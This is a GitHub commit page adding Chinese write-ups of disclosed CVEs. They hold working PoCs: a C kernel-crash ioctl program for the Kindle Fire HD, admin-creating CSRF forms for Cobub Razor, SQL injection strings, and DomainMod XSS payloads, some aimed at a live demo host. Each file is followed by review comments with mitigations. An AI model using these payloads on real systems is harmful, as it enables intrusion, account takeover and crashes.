update
Mr-xn committed Jul 24, 2019
1 parent 58f1b49 commit 0e7ad92
Showing 29 changed files with 1,015 additions and 1 deletion.
@@ -0,0 +1,230 @@
### 漏洞简介

|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|Amazon Kindle Fire HD (3rd Generation)内核驱动拒绝服务漏洞|2018-10-10|大兵|[http://www.amazon.com/](http://www.amazon.com/) | [下载连接](https://fireos-tablet-src.s3.amazonaws.com/46sVcHzumgrjpCXPHw6oygKVmw/kindle_fire_7inch_4.5.5.3.tar.bz2) |Fire OS 4.5.5.3| [CVE-2018-11021](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11021)|

#### 漏洞概述

> Amazon Kindle Fire HD(3rd) Fire OS 4.5.5.3的内核模块/omap/drivers/video/omap2/dsscomp/device.c代码中存在漏洞,允许攻击者通过ioctl向驱动模块/dev/dsscomp发生命令为1118064517且精心构造的payload参数,导致内核崩溃。

### POC实现代码如下:

> exp代码如下:
``` c
/*
* This is poc of Kindle Fire HD 3rd
* A bug in the ioctl interface of device file /dev/dsscomp causes the system crash via IOCTL 1118064517.
* Related buggy struct name is dsscomp_setup_dispc_data.
* This Poc should run with permission to do ioctl on /dev/dsscomp.
*
* The fowllwing is kmsg of kernel crash infomation:
*
*
*/
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

const static char *driver = "/dev/dsscomp";
static command = 1118064517;

int main(int argc, char **argv, char **env) {
unsigned int payload[] = {
0xffffffff,
0x00000003,
0x5d200040,
0x79900008,
0x8f5928bd,
0x78b02422,
0x00000000,
0xffffffff,
0xf4c50400,
0x007fffff,
0x8499f562,
0xffff0400,
0x001b131d,
0x60818210,
0x00000007,
0xffffffff,
0x00000000,
0x9da9041c,
0xcd980400,
0x001f03f4,
0x00000007,
0x2a34003f,
0x7c80d8f3,
0x63102627,
0xc73643a8,
0xa28f0665,
0x00000000,
0x689e57b4,
0x01ff0008,
0x5e7324b1,
0xae3b003f,
0x0b174d86,
0x00000400,
0x21ffff37,
0xceb367a4,
0x00000040,
0x00000001,
0xec000f9e,
0x00000001,
0x000001ff,
0x00000000,
0x00000000,
0x0000000f,
0x0425c069,
0x038cc3be,
0x0000000f,
0x00000080,
0xe5790100,
0x5b1bffff,
0x0000d355,
0x0000c685,
0xa0070000,
0x0010ffff,
0x00a0ff00,
0x00000001,
0xff490700,
0x0832ad03,
0x00000006,
0x00000002,
0x00000001,
0x81f871c0,
0x738019cb,
0xbf47ffff,
0x00000040,
0x00000001,
0x7f190f33,
0x00000001,
0x8295769b,
0x0000003f,
0x869f2295,
0xffffffff,
0xd673914f,
0x05055800,
0xed69b7d5,
0x00000000,
0x0107ebbd,
0xd214af8d,
0xffff4a93,
0x26450008,
0x58df0000,
0xd16db084,
0x03ff30dd,
0x00000001,
0x209aff3b,
0xe7850800,
0x00000002,
0x30da815c,
0x426f5105,
0x0de109d7,
0x2c1a65fc,
0xfcb3d75f,
0x00000000,
0x00000001,
0x8066be5b,
0x00000002,
0xffffffff,
0x5cf232ec,
0x680d1469,
0x00000001,
0x00000020,
0xffffffff,
0x00000400,
0xd1d12be8,
0x02010200,
0x01ffc16f,
0xf6e237e6,
0x007f0000,
0x01ff08f8,
0x000f00f9,
0xbad07695,
0x00000000,
0xbaff0000,
0x24040040,
0x00000006,
0x00000004,
0x00000000,
0xbc2e9242,
0x009f5f08,
0x00800000,
0x00000000,
0x00000001,
0xff8800ff,
0x00000001,
0x00000000,
0x000003f4,
0x6faa8472,
0x00000400,
0xec857dd5,
0x00000000,
0x00000040,
0xffffffff,
0x3f004874,
0x0000b77a,
0xec9acb95,
0xfacc0001,
0xffff0001,
0x0080ffff,
0x3600ff03,
0x00000001,
0x8fff7d7f,
0x6b87075a,
0x00000000,
0x41414141,
0x41414141,
0x41414141,
0x41414141,
0x001001ff,
0x00000000,
0x00000001,
0xff1f0512,
0x00000001,
0x51e32167,
0xc18c55cc,
0x00000000,
0xffffffff,
0xb4aaf12b,
0x86edfdbd,
0x00000010,
0x0000003f,
0xabff7b00,
0xffff9ea3,
0xb28e0040,
0x000fffff,
0x458603f4,
0xffff007f,
0xa9030f02,
0x00000001,
0x002cffff,
0x9e00cdff,
0x00000004,
0x41414141,
0x41414141,
0x41414141,
0x41414141 };

int fd = 0;
fd = open(driver, O_RDWR);
if (fd < 0) {
printf("Failed to open %s, with errno %d\n", driver, errno);
system("echo 1 > /data/local/tmp/log");
return -1;
}
printf("Try open %s with command 0x%x.\n", driver, command);
printf("System will crash and reboot.\n");
if(ioctl(fd, command, &payload) < 0) {
printf("Allocation of structs failed, %d\n", errno);
system("echo 2 > /data/local/tmp/log");
return -1;
}
close(fd);
return 0;
}
```
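Review bot: `static command = 1118064517;` declares the ioctl request number with no type, which relies on implicit int (removed in C99) and is rejected or warned about by current compilers; give it an explicit type such as `static const int command = 1118064517;` so the PoC builds cleanly on the Android toolchain. The file also calls `close()` and `system()` without `#include <unistd.h>` and `#include <stdlib.h>`. The header comment announces "The fowllwing is kmsg of kernel crash infomation:" and then leaves the section empty, so a reader cannot see which path in dsscomp's device.c faults on the `dsscomp_setup_dispc_data` input; paste the crash log or drop that line. Since the comment itself states the program needs ioctl permission on /dev/dsscomp, the write-up should say plainly that the impact is a local denial of service by a process already holding that access, and that the mitigation is input validation of the setup structure in the driver plus restricting the device node's permissions.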
28 changes: 28 additions & 0 deletions Cobub Razor 0.7.2存在跨站请求伪造漏洞.md
@@ -0,0 +1,28 @@
### 漏洞简介

|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|Cobub Razor 0.7.2存在跨站请求伪造漏洞|2018-03-06|Kyhvedn([email protected][email protected]|[http://www.cobub.com/](http://www.cobub.com/) | [https://github.com/cobub/razor/](https://github.com/cobub/razor/) |0.7.2 | [CVE-2018-7720](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7720)|

#### 漏洞概述

> Cobub Razor 0.7.2存在跨站请求伪造漏洞,管理员登陆后访问特定页面可增加管理员账号。保存如下利用代码为html页面,打开页面将增加test123/test的管理员账号。
### POC实现代码如下:

> 利用代码如下:
``` html
<body>
<script>alert(document.cookie)</script>
<form action="http://localhost/index.php?/user/createNewUser/" method="POST">
<input type="hidden" name="username" value="test123" />
<input type="hidden" name="email" value="test&#64;test123&#46;test" />
<input type="hidden" name="password" value="test" />
<input type="hidden" name="confirm&#95;password" value="test" />
<input type="hidden" name="userrole" value="3" />
<input type="hidden" name="user&#47;ccreateNewUser" value="&#136;&#155;&#187;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
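Review bot: the PoC page closes with `</html>` but never opens `<html>`, and the `<script>alert(document.cookie)</script>` line is an unrelated XSS probe left inside what is meant to be a CSRF demonstration; add the opening tag and remove the script line. The hidden field `user/ccreateNewUser` with value `&#136;&#155;&#187;` reads like a mangled fragment of a captured request (note the doubled "c") and should be explained or dropped. The write-up gives no remediation, and the table lists no patched version: the expected fix for the `/user/createNewUser/` action is a per-session anti-CSRF token validated server-side, with session cookies marked SameSite, which is worth stating for readers running 0.7.2.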
29 changes: 29 additions & 0 deletions Cobub Razor 0.7.2越权增加管理员账户.md
@@ -0,0 +1,29 @@
### 漏洞简介

|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|Cobub Razor 0.7.2越权增加管理员账户|2018-04-09|ppb([email protected]|[https://github.com/cobub/razor/](https://github.com/cobub/razor/) | [https://github.com/cobub/razor/](https://github.com/cobub/razor/) |0.72| [CVE-2018-7745](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7745)|

#### 漏洞概述

> Cobub Razor 0.7.2越权增加管理员账户漏洞,在不登录的情况下发送特定数据包,可新增管理员账号。保存如下利用代码为html页面,打开页面将增加test/test123的管理员账号,漏洞发现者已经将漏洞信息通过[issues](https://github.com/cobub/razor/issues/161)告知作者。

### POC实现代码如下:

> 利用代码如下:
``` html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/index.php?/install/installation/createuserinfo" method="POST">
<input type="hidden" name="siteurl" value="http://127.0.0.1/" />
<input type="hidden" name="superuser" value="test" />
<input type="hidden" name="pwd" value="test123" />
<input type="hidden" name="verifypassword" value="test123" />
<input type="hidden" name="email" value="[email protected]" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
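Review bot: the version cell reads `0.72` while the title and the overview say 0.7.2; correct the table so readers searching by version find the entry. The product homepage column points at the GitHub repository, whereas the other Cobub entries in this commit use `http://www.cobub.com/`; keep one convention. On substance, what the PoC shows is that the installer action `/install/installation/createuserinfo` stays callable after installation, so the mitigation to state is that the install controller must be disabled or removed once setup completes, and the linked issue #161 should be referenced for the vendor's response once there is one.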
18 changes: 18 additions & 0 deletions Cobub Razor 0.8.0存在SQL注入漏洞.md
@@ -0,0 +1,18 @@
### 漏洞简介

|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|Cobub Razor 0.8.0存在SQL注入漏洞|2018-04-16|Kyhvedn([email protected][email protected]|[http://www.cobub.com/](http://www.cobub.com/) | [https://github.com/cobub/razor/](https://github.com/cobub/razor/) |0.8.0| [CVE-2018-8057](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8057)|

#### 漏洞概述

> Cobub Razor 0.8.0存在SQL注入漏洞,“/application/controllers/manage/channel.php”页面的“channel_name”及“platform”参数过滤不严格导致存在SQL注入漏洞。Cobub Razor是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/cobub/razor/issues/162)告知作者。

### POC实现代码如下:

> http://localhost/index.php?/manage/channel/addchannel
> POST data:
> 1.channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1700=1700,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=1
> 2.channel_name=test" AND SLEEP(5)-- NklJ&platform=1
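Review bot: the PoC section is written as `>` quote lines instead of a fenced block, unlike the other files in this commit; put the URL and the two POST bodies in a ``` raw fence so markdown does not reflow the quotes and `--` sequences. The overview names both `channel_name` and `platform` as insufficiently filtered, but both requests inject only through `channel_name` and send `platform=1` unchanged; either add evidence for `platform` or narrow the claim. The remediation is missing and should be stated: bind these parameters through the framework's query builder or prepared statements in `/application/controllers/manage/channel.php` rather than concatenating them into SQL.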
40 changes: 40 additions & 0 deletions Cobub Razor 0.8.0存在物理路径泄露漏洞.md
@@ -0,0 +1,40 @@
### 漏洞简介

|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|Cobub Razor 0.8.0存在物理路径泄露漏洞|2018-04-20|Kyhvedn([email protected][email protected]|[http://www.cobub.com/](http://www.cobub.com/) | [https://github.com/cobub/razor/](https://github.com/cobub/razor/) | 0.8.0| [CVE-2018-8056](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8056)/[CVE-2018-8770](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770)|

#### 漏洞概述

> Cobub Razor 0.8.0存在物理路径泄露漏洞,当访问特定url时,系统会显示物理路径信息。Cobub Razor是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/cobub/razor/issues/162)告知作者。
### POC实现代码如下:

> 方法一:
``` raw
URL: http://localhost/export.php
HTTP Method: GET
URL: http://localhost/index.php?/manage/channel/addchannel
HTTP Method: POST
Data: channel_name=test"&platform=1
```
> 方法二:
> Cobub Razor 0.8.0存在物理路径泄露漏洞,当访问特定url时,系统会显示物理路径信息。Cobub Razor是一个在github上开源的系统。
``` raw
HTTP Method: GET
http://localhost/tests/generate.php
http://localhost/tests/controllers/getConfigTest.php
http://localhost/tests/controllers/getUpdateTest.php
http://localhost/tests/controllers/postclientdataTest.php
http://localhost/tests/controllers/posterrorTest.php
http://localhost/tests/controllers/posteventTest.php
http://localhost/tests/controllers/posttagTest.php
http://localhost/tests/controllers/postusinglogTest.php
http://localhost/tests/fixtures/Controller_fixt.php
http://localhost/tests/fixtures/Controller_fixt2.php
http://localhost/tests/fixtures/view_fixt2.php
http://localhost/tests/libs/ipTest.php
http://localhost/tests/models/commonDbfix.php
```
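Review bot: the quoted line after `方法二:` repeats the overview sentence word for word and should be deleted; the second method needs its own one-line description of what the listed `tests/` files disclose when requested. The table lists two identifiers, CVE-2018-8056 and CVE-2018-8770, without saying which method each one covers; map them explicitly. The first raw block mixes a GET to `/export.php` and a POST to `/manage/channel/addchannel` with no separator, so split it into two blocks. Mitigation to state: deploy without the `tests/` directory and turn off `display_errors` in production so PHP warnings do not echo absolute filesystem paths.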
39 changes: 39 additions & 0 deletions DomainMod的XSS集合.md
@@ -0,0 +1,39 @@
### 漏洞简介

|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|DomainMod的XSS|2018-05-24|longer/套哥([email protected]|[https://github.com/domainmod/domainmod](https://github.com/domainmod/domainmod) | [https://github.com/domainmod/domainmod](https://github.com/domainmod/domainmod) |4.09.03/4.10.0| [CVE-2018-11403](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11403)/[CVE-2018-11403](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11403)/[CVE-2018-11404](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11404)/[CVE-2018-11558](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11558)/[CVE-2018-11559](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11559)|

#### 漏洞概述

> DomainMod v4.09.03版本和v4.10.0版本 存在XSS的页面

### POC实现代码如下:

> DomainMod v4.09.03版本的“assets/edit/account-owner.php”页面的“oid”参数存在一个XSS漏洞,当用户登陆后访问url`http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E`,会触发XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/domainmod/domainmod/issues/63)告知作者。
>CSRF测试页面代码如下:
``` html
http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E
```
> DomainMod v4.09.03版本的“assets/edit/ssl-provider-account.php”页面的“sslpaid”参数存在一个XSS漏洞,当用户登陆后访问url`http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E`,会触发XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/domainmod/domainmod/issues/63)告知作者。
>CSRF测试页面代码如下:
``` html
http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E
```
> DomainMod 4.10.0版本的“/settings/profile/index.php”页面的“new_first_name”参数过滤不严格导致存在一个XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/domainmod/domainmod/issues/66)告知作者。
>用户登陆后提交如下数据包,更改用户信息后,当管理员查看用户是XSS漏洞触发:
``` raw
post url https://demo.domainmod.org/settings/profile/
post data:new_first_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_last_name=test&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0
```
> DomainMod 4.10.0版本的“/settings/profile/index.php”页面的“new_last_name”参数过滤不严格导致存在一个存储型XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过[issues](https://github.com/domainmod/domainmod/issues/66)告知作者。
>用户登陆后提交如下数据包,更改用户信息后,当管理员查看用户是XSS漏洞触发:
``` raw
post url https://demo.domainmod.org/settings/profile/
post data:new_first_name=test&new_last_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0
```
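Review bot: the label `CSRF测试页面代码如下` ("CSRF test page code follows") above the first two fenced blocks is wrong: the blocks hold reflected-XSS URLs, not a CSRF page, and are tagged ``` html while containing plain URLs, so relabel them and use a raw fence as the later entries do. The CVE column lists CVE-2018-11403 twice and never states which of the five identifiers maps to which of the four issues described; add that mapping. The last two PoCs post to `https://demo.domainmod.org/...`, a live third-party host, whereas the rest of the commit targets 127.0.0.1; rewrite them against a local instance. Typo: `当管理员查看用户是XSS漏洞触发` should read `...时...`. The remediation, context-aware output encoding of `oid`, `sslpaid`, `new_first_name` and `new_last_name` before they are rendered, is absent and should be added alongside the issue links.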
0 comments on commit 0e7ad92
